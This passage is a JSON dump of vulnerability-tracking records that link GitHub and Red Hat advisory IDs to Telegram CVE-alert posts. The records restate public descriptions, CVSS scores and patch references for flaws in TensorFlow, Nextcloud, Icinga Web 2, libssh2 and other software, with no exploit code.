in user to read a template without being authorized to do so. This vulnerability has been patched in 4.3.4. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-08-01T19:10:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:28.215Z\n\ud83d\udd17 References:\n1. https://github.com/elabftw/elabftw/security/advisories/GHSA-63qq-hw97-8q7x", "creation_timestamp": "2025-04-23T18:05:49.000000Z"}, {"uuid": "5ea9ece5-6bf2-4274-ac1a-f0db4013f7e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32FF-4G79-VGFC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13107", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31177\n\ud83d\udd25 CVSS Score: 2.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Flask-AppBuilder is an application development framework built on top of Flask python framework. In versions prior to 4.1.3 an authenticated Admin user could query other users by their salted and hashed passwords strings. These filters could be made by using partial hashed password strings. The response would not include the hashed passwords, but an attacker could infer partial password hashes and their respective users. This issue has been fixed in version 4.1.3. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-08-01T19:05:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:34.614Z\n\ud83d\udd17 References:\n1. https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-32ff-4g79-vgfc\n2. https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.1.3", "creation_timestamp": "2025-04-23T18:05:49.000000Z"}, {"uuid": "dbbb2124-9dda-4536-b0a5-ab92c25cdd31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H78C-5CJX-JW6X", "type": "published-proof-of-concept", "source": "Telegram/OqvPk0TC77Z9DcsSU3c5lTkKTjblqJB8uZv-6Qb5bDB6CAw", "content": "", "creation_timestamp": "2026-01-02T21:51:48.000000Z"}, {"uuid": "05ca9bde-2c62-436f-82b8-abdfb14757f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-828C-5J5Q-VRJQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13089", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36013\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `mlir::tfg::GraphDefImporter::ConvertNodeDef` tries to convert NodeDefs without an op name, it crashes. We have patched the issue in GitHub commit a0f0b9a21c9270930457095092f558fbad4c03e5. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:30:14.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:35.082Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-828c-5j5q-vrjq\n2. https://github.com/tensorflow/tensorflow/commit/a0f0b9a21c9270930457095092f558fbad4c03e5\n3. https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/graphdef_import.cc", "creation_timestamp": "2025-04-23T17:05:05.000000Z"}, {"uuid": "0760677a-0f2e-429f-842e-5b06bfa3c13f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHFC-2Q7X-929F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13088", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35994\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `CollectiveGather` receives an scalar input `input`, it gives a `CHECK` fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c1f491817dec39a26be3c574e86a88c30f3c4770. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:20:31.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:41.356Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fhfc-2q7x-929f\n2. https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770", "creation_timestamp": "2025-04-23T17:05:05.000000Z"}, {"uuid": "8e92d54d-a873-43ff-b888-e3541096a6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G925-F788-4JH7", "type": "published-proof-of-concept", "source": "Telegram/RP142WcXZVZZM4yb6Vg5Bi-obLVsVHz267yRzNk0mXmOvUc", "content": "", "creation_timestamp": "2026-01-02T21:52:07.000000Z"}, {"uuid": "2e6e9ea0-67bf-4390-9d35-7a46eaf22a19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8VCG-CFXJ-P5M3", "type": "published-proof-of-concept", "source": "Telegram/RP142WcXZVZZM4yb6Vg5Bi-obLVsVHz267yRzNk0mXmOvUc", "content": "", "creation_timestamp": "2026-01-02T21:52:07.000000Z"}, {"uuid": "12ac62f8-4e83-414a-b106-5055e2e1fb03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7RQC-FF8M-7J23", "type": "published-proof-of-concept", "source": "Telegram/d-ziUJquW87C-wxQ1bihwuEueQX9ENOtUxcvU39erDutk3U", "content": "", "creation_timestamp": "2026-01-02T21:54:27.000000Z"}, {"uuid": "f386951e-63a0-4326-b4c4-3dd5be19d420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9H5-VR8M-X2H4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13081", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35995\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `AudioSummaryV2` receives an input `sample_rate` with more than one element, it gives a `CHECK` fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit bf6b45244992e2ee543c258e519489659c99fb7f. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:15:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:27.650Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g9h5-vr8m-x2h4\n2. https://github.com/tensorflow/tensorflow/commit/bf6b45244992e2ee543c258e519489659c99fb7f", "creation_timestamp": "2025-04-23T17:04:55.000000Z"}, {"uuid": "d5c88831-2e4f-4f4d-b382-6962e0af6b3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5P73-QG2V-383H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13091", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31158\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: LTI 1.3 Tool Library is a library used for building IMS-certified LTI 1.3 tool providers in PHP. Prior to version 5.0, the Nonce Claim Value was not being validated against the nonce value sent in the Authentication Request. Users should upgrade to version 5.0 to receive a patch. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-07-15T17:15:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:58:17.098Z\n\ud83d\udd17 References:\n1. https://github.com/packbackbooks/lti-1-3-php-library/security/advisories/GHSA-5p73-qg2v-383h", "creation_timestamp": "2025-04-23T18:05:26.000000Z"}, {"uuid": "70cea15a-ba03-43d3-869f-492255801b3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F63-H6G3-7CWM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13115", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24717\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: ssr-pages is an HTML page builder for the purpose of server-side rendering (SSR). In versions prior to 0.1.5, a cross site scripting (XSS) issue can occur when providing untrusted input to the `redirect.link` property as an argument to the `build(MessagePageOptions)` function. While there is no known workaround at this time, there is a patch in version 0.1.5.\n\ud83d\udccf Published: 2022-03-01T18:40:11.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:43.610Z\n\ud83d\udd17 References:\n1. https://github.com/Finastra/ssr-pages/security/advisories/GHSA-7f63-h6g3-7cwm\n2. https://github.com/Finastra/ssr-pages/pull/2\n3. https://github.com/Finastra/ssr-pages/pull/2/commits/133606ffaec2edd9918d9fba5771ed21da7876a5\n4. https://github.com/Finastra/ssr-pages/commit/98abc59e28fec48246be0d59ac144675d6361073", "creation_timestamp": "2025-04-23T19:05:07.000000Z"}, {"uuid": "0b505f35-c180-49ca-ba81-89628cecad4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WCJ4-JW5J-44WH", "type": "seen", "source": "Telegram/JxPXMx_RS9I7Z3kYw2DwOkNmPXjWN_fhlFmYgdz0OY1MqXE", "content": "", "creation_timestamp": "2026-01-02T21:53:17.000000Z"}, {"uuid": "074e3ce4-10d3-413c-8d65-1aff1711586a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G722-CM3H-8WRX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13126", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41239\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud server is a self hosted system designed to provide cloud style services. In affected versions the User Status API did not consider the user enumeration settings by the administrator. This allowed a user to enumerate other users on the instance, even when user listings where disabled. It is recommended that the Nextcloud Server is upgraded to 20.0.14, 21.0.6 or 22.2.1. There are no known workarounds.\n\ud83d\udccf Published: 2022-03-08T18:05:12.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:33.406Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-g722-cm3h-8wrx\n2. https://github.com/nextcloud/server/issues/27122\n3. https://github.com/nextcloud/server/pull/29260\n4. https://security.gentoo.org/glsa/202208-17", "creation_timestamp": "2025-04-23T19:05:26.000000Z"}, {"uuid": "a458ad85-dcf4-47cd-a57c-7ff2d3ce2d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-497C-C8HX-6QCF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13125", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41181\n\ud83d\udd25 CVSS Score: 2.4 (cvssV3_1, Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud talk is a self hosting messaging service. In versions prior to 12.3.0 the Nextcloud Android Talk application did not properly detect the lockscreen state when a call was incoming. If an attacker got physical access to the locked phone, and the victim received a phone call the attacker could gain access to the chat messages and files of the user. It is recommended that the Nextcloud Android Talk App is upgraded to 12.3.0. There are no known workarounds.\n\ud83d\udccf Published: 2022-03-08T17:50:10.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:39.326Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-497c-c8hx-6qcf\n2. https://github.com/nextcloud/talk-android/pull/1585", "creation_timestamp": "2025-04-23T19:05:22.000000Z"}, {"uuid": "18daaf3c-ac5f-4798-8a9e-917c9bd86e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5P3F-RH28-8FRW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13124", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24716\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.\n\ud83d\udccf Published: 2022-03-08T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:45.413Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw\n2. https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d\n3. https://security.gentoo.org/glsa/202208-05\n4. http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html", "creation_timestamp": "2025-04-23T19:05:21.000000Z"}, {"uuid": "a151f563-6a8a-462b-bdf7-8171fe4c92ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5PQ-GVJ9-9VR8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13128", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24713\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes to take an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. All versions of the regex crate before or equal to 1.5.4 are affected by this issue. The fix is include starting from regex 1.5.5. All users accepting user-controlled regexes are recommended to upgrade immediately to the latest version of the regex crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, it us not recommend to deny known problematic regexes.\n\ud83d\udccf Published: 2022-03-08T19:00:12.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:21.068Z\n\ud83d\udd17 References:\n1. https://github.com/rust-lang/regex/security/advisories/GHSA-m5pq-gvj9-9vr8\n2. https://github.com/rust-lang/regex/commit/ae70b41d4f46641dbc45c7a4f87954aea356283e\n3. https://groups.google.com/g/rustlang-security-announcements/c/NcNNL1Jq7Yw\n4. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PDOWTHNVGBOP2HN27PUFIGRYNSNDTYRJ/\n5. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JANLZ3JXWJR7FSHE57K66UIZUIJZI67T/\n6. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O3YB7CURSG64CIPCDPNMGPE4UU24AB6H/\n7. https://lists.debian.org/debian-lts-announce/2022/04/msg00003.html\n8. https://www.debian.org/security/2022/dsa-5113\n9. https://lists.debian.org/debian-lts-announce/2022/04/msg00009.html\n10. https://www.debian.org/security/2022/dsa-5118\n11. https://security.gentoo.org/glsa/202208-08\n12. https://security.gentoo.org/glsa/202208-14", "creation_timestamp": "2025-04-23T19:05:28.000000Z"}, {"uuid": "5c2c13b0-af19-4874-a7c7-bea95f62a5bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4WP-R357-4Q94", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13127", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41241\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Nextcloud server is a self hosted system designed to provide cloud style services. The groupfolders application for Nextcloud allows sharing a folder with a group of people. In addition, it allows setting \"advanced permissions\" on subfolders, for example, a user could be granted access to the groupfolder but not specific subfolders. Due to a lacking permission check in affected versions, a user could still access these subfolders by copying the groupfolder to another location. It is recommended that the Nextcloud Server is upgraded to 20.0.14, 21.0.6 or 22.2.1. Users unable to upgrade should disable the \"groupfolders\" application in the admin settings.\n\ud83d\udccf Published: 2022-03-08T18:25:10.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:26.893Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-m4wp-r357-4q94\n2. https://github.com/nextcloud/groupfolders/issues/1692\n3. https://github.com/nextcloud/server/pull/29362\n4. https://security.gentoo.org/glsa/202208-17", "creation_timestamp": "2025-04-23T19:05:27.000000Z"}, {"uuid": "3b35a2c7-a988-400a-ba92-963748ca5d89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2399", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "f656d8e3-13a2-409b-be2f-4713999940f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75P7-527P-W8WP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24739\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: alltube is an html front end for youtube-dl. On releases prior to 3.0.3, an attacker could craft a special HTML page to trigger either an open redirect attack or a Server-Side Request Forgery attack (depending on how AllTube is configured). The impact is mitigated by the fact the SSRF attack is only possible when the `stream` option is enabled in the configuration. (This option is disabled by default.) 3.0.3 contains a fix for this vulnerability.\n\ud83d\udccf Published: 2022-03-08T21:40:10.000Z\n\ud83d\udccf Modified: 2025-04-23T18:56:39.899Z\n\ud83d\udd17 References:\n1. https://github.com/Rudloff/alltube/security/advisories/GHSA-75p7-527p-w8wp\n2. https://github.com/Rudloff/alltube/commit/3a4f09dda0a466662a4e52cde674749e0c668e8d\n3. https://github.com/Rudloff/alltube/commit/8913f27716400dabf4906a5ad690a5238f73496a\n4. https://github.com/Rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a", "creation_timestamp": "2025-04-23T19:05:30.000000Z"}, {"uuid": "76dce10e-543d-4545-9552-dcc3fb814200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCMG-VR56-X9WF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13129", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24714\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Installations of Icinga 2 with the IDO writer enabled are affected. If you use service custom variables in role restrictions, and you regularly decommission service objects, users with said roles may still have access to a collection of content. Note that this only applies if a role has implicitly permitted access to hosts, due to permitted access to at least one of their services. If access to a host is permitted by other means, no sensible information has been disclosed to unauthorized users. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2.\n\ud83d\udccf Published: 2022-03-08T19:55:09.000Z\n\ud83d\udccf Modified: 2025-04-23T18:56:46.880Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-qcmg-vr56-x9wf\n2. https://github.com/Icinga/icingaweb2/commit/6e989d05a1568a6733a3d912001251acc51d9293\n3. https://security.gentoo.org/glsa/202208-05", "creation_timestamp": "2025-04-23T19:05:29.000000Z"}, {"uuid": "e50991da-47e0-4699-bac2-2d2d369a6651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:0679", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "d4f0a36c-7b81-42ff-b4a8-278b107b1159", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1175", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "c9418c17-0e44-4d66-a98d-ec394d481f1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1943", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 